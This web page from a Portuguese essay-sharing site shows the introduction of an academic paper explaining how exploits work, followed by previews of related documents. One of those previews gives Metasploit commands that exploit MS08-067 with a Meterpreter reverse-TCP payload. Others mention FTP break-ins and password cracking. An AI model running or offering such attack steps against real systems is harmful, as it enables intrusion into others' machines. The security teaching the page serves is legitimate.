Como funcionam os exploits

3145 palavras 13 páginas
Exibir mais
COMO FUNCIONAM OS EXPLOITS
Aléxis Rodrigues de Almeida1

Resumo – Este documento descreve o que são e como funcionam os exploits, procurando mostrar, através de um exemplo real, os riscos que essas ferramentas de ataque representam para uma rede de computadores. Palavras chaves: exploit, buffer overflow, segurança.

1

Introdução

Nos dias atuais são indiscutíveis os grandes benefícios obtidos por meio da interligação dos computadores em uma única e grande rede acessível a partir de qualquer ponto do globo. A Internet, essa grande teia que une milhões de computadores em torno do mundo, é uma conquista irreversível que admite um único futuro: uma contínua e frequente expansão. Entretanto, com o advento dessa incrível interconexão de máquinas em escala mundial, muitos ainda são os problemas que precisam ser resolvidos para que os usuários obtenham uma razoável segurança na utilização dos serviços disponibilizados na grande rede. Cada novo serviço ou funcionalidade implementada pelos fabricantes de softwares utilizados nas redes de computadores encontra, frequentemente, uma imediata resposta de hackers e crackers. Esses “usuários” utilizam seus conhecimentos avançados de programação de computadores para explorar falhas existentes nos códigos desenvolvidos para essas novas funcionalidades. Esse é um problema do qual ninguém está totalmente livre. Conforme (FIREWALLS SECURITY CORPORATION) , até mesmo programas famosos e considerados seguros já foram lançados no mercado com esse tipo de vulnerabilidade. Essas investidas contra fraquezas nos sistemas operacionais e aplicativos são apoiadas por ferramentas conhecidas como exploits. O resultado desses ataques pode ser simplesmente uma momentânea indisponibilidade do serviço (DOS – Denial Of Service) ou, na pior situação, a abertura de um acesso privilegiado no computador hospedeiro do serviço que sofreu o ataque. A partir desse acesso obtido, poderão ser provocados prejuízos imprevisíveis dentro da rede atacada.

Relacionados

  • o que é perspectiva de fischer e de haworth
    2310 palavras | 10 páginas

    buteco de esquina você acha! :) Adicionando Exploit ao MSF Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, para motivo de organização: O que estou adicionando? Para qual sistema operacional ele é útil? O que ele explora? Entendeu mais ou menos? Vou explicar. Vamos para o diretório padrão do msf, para isso digite: root@bt:~# cd /pentest/exploits/framework3/ root@bt:/pentest/exploits/framework3# ls HACKING documentation lib msfcli….

    exibir mais
  • Segurança em Sistemas Operacionais de Redes
    5106 palavras | 21 páginas

    Tema: Exploit ou Metaexploit e como corrigir está ameaça. RESUMO Este artigo pretende apresentar de forma didática o que é um exploit. O objetivo principal, é destacar os vários tipos de exploits existentes atualmente, como atuam em suas invasões aos sistemas, as conseqüências geradas e o nível de conhecimento preciso para criar seu próprio exploit. Este trabalho também aborda as ferramentas que podem ser utilizadas para criação e execução dos mesmos, além de um teste prático para demonstrar….

    exibir mais
  • O que um virus de computador
    3477 palavras | 14 páginas

    .......................................................................................... 6 Cavalo de Tróia .............................................................................................................................. 7 O que é Exploit? ............................................................................................................................ 8 Spoofing .............................................................................................................….

    exibir mais
  • Armitage
    4296 palavras | 18 páginas

    1. Sobre Armitage 1. 1 O que é Armitage? Armitage é uma ferramenta de gerenciamento de ataque cibernético gráfica para Metasploit que visualiza seus alvos, recomenda exploits e apresenta os recursos avançados do quadro. Armitage visa tornar Metasploit utilizável para os profissionais de segurança que entender a pirataria, mas não usam Metasploit todos os dias. Se você quiser aprender Metasploit e crescer em recursos avançados, Armitage pode ajudá-lo. 1,2 Gerenciamento de Cyber ataque….

    exibir mais
  • Ataques Hacker
    812 palavras | 4 páginas

    senha Quebra de senhas, tanto em programas com em sistemas. Exploits O termo exploit, que em português significa explorar, na linguagem da Internet é usado para se referir a pequenos códigos de programas desenvolvidos especialmente para explorar falhas introduzidas em aplicativos por erros involuntários de programação. http://www.securityfocus.com Segurança de Redes BHOs Browser Helper Objects são DLLs que funcionam como plugins do Internet Explorer, podendo ver (e alterar) todos….

    exibir mais
  • 2012_analise_vulnerabilidades_em_sistemas
    13784 palavras | 56 páginas

    Minicursos do XII Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais — SBSeg 2012 Capítulo 1 Análise de vulnerabilidades em Sistemas Computacionais Modernos: Conceitos, Exploits e Proteções Mateus Felipe Tymburibá Ferreira, Thiago de Souza Rocha, Gilbert Breves Martins, Eduardo Feitosa e Eduardo Souto Instituto de Computação (IComp) Universidade Federal do Amazonas 69077000 - Manaus - AM - Brasil {mateus, thiago.rocha, gilbert.martins, efeitosa, esouto}@icomp….

    exibir mais
  • ACESSO ROOT ALL ANDROIDS
    960 palavras | 4 páginas

    de permissão root, uma janela popup vai perguntar se você permite ou não a operação. Com isso, a segurança do sistema não é comprometida. Em casos de desastre, ter o root pode te fazer poupar muito tempo. Existem vários utilitários de backup que funcionam com permissões de root para ajudá-lo a restaurar os aplicativos e as configurações exatamente como estavam antes. Um exemplo é o programa Titanium Backup. Há ainda a possibilidade de realizar um backup integral de todo o SO através do recovery, permitindo….

    exibir mais
  • Quase tudo sobre FTP (File Transfer Protocol)
    8680 palavras | 35 páginas

    rede via FTP Como criar uma conexão de rede com o servidor - FTP UNIX Usuários Navegação Principais comandos UNIX Modificando os permissões Principais diretórios - Senhas e Exploits Login anônimo Logar como root Diretório das senhas Decriptografando uma senha Quebrando uma senha Exploits UNIX BuG DE PHF Principais Falhas de FTP PREFÁCIO Atualmente invadir um servidor de FTP não é mais uma tarefa facio. Os sistemas operacionais, protocolos evoluíram, muitos bugs foram….

    exibir mais
  • Informática
    1167 palavras | 5 páginas

    página inicial colocando frases de protesto ou quando tiram serviços do ar. Recebem esse nome por não saber o que estão fazendo. Eles simplesmente buscam ferramentas prontas, os chamados exploits, que exploram uma determinada vulnerabilidade, e então buscam servidores e serviços vulneráveis. Não sabem como o exploit funciona, já que ele que foi denvolvido por um Black Hat, que provavelmente estudou o assunto. Grande parte dos Black Hats já atuou como Script Kid no início de sua jornada no mundo do….

    exibir mais
  • Desenvolvimento e segurança da informação
    2309 palavras | 10 páginas

    iniciais nos arquivos utilizados no teste. Escolhendo o exploit especifico: msf> use exploit/Windows/smb/ms08_067_netapi Setando o endereço de rede do RHOST (host remoto/alvo): msf>set RHOST 192.168.0.2 • PASSO 3: Em seguida escolhemos o payload (Ação a ser executada no alvo): msf>set PAYLOAD Windows/meterpreter/reverse_tcp Setando o LHOST (host local/origem): msf>set RHOST 192.168.0.3 • PASSO 4: Executamos o comando que efetiva o ataque: msf>exploit. Tal comando explora a vulnerabilidade MS08_067 e….

    exibir mais

Outros Trabalhos Populares